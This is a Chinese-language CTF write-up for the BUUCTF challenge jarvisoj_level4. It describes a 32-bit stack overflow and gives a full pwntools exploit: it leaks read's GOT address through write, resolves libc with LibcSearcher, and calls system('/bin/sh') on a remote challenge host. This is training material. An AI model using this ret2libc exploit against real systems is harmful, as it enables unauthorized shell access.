BUUCTF---jarvisoj_level4

环境：WSL2，ubuntu16.04，python2

checksec文件:

将文件拖入ida
溢出点：

和level3不同的是
read函数之前没有调用write函数，因此要泄露libc的基地址需要用read函数，利用write函数将read函数在got表中的地址泄露出来

payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4)

接受泄露出来的地址

read_addr = u32(io.recv(4))

然后就是常规的找到system函数的地址和bin/sh的地址，并调用。

libc = LibcSearcher("read",read_addr)
libc_base = read_addr - libc.dump('read')
sys_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump("str_bin_sh")

完整exp：

# coding=utf-8
from pwn import *
from LibcSearcher import *

#io = process("./level4")
io = remote("node4.buuoj.cn","29445")
elf = ELF("./level4")
context(os = "linux", arch = "i386")

read_got = elf.got['read']
write_plt= elf.plt['write']
main_addr = 0x8048470

payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)
io.send(payload)

read_addr = u32(io.recv(4))

libc = LibcSearcher("read",read_addr)
libc_base = read_addr - libc.dump('read')
sys_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump("str_bin_sh")

payload = (0x88+0x04)*'a'+p32(sys_addr)+p32(0)+p32(bin_sh_addr)
io.send(payload)
io.interactive()

结果：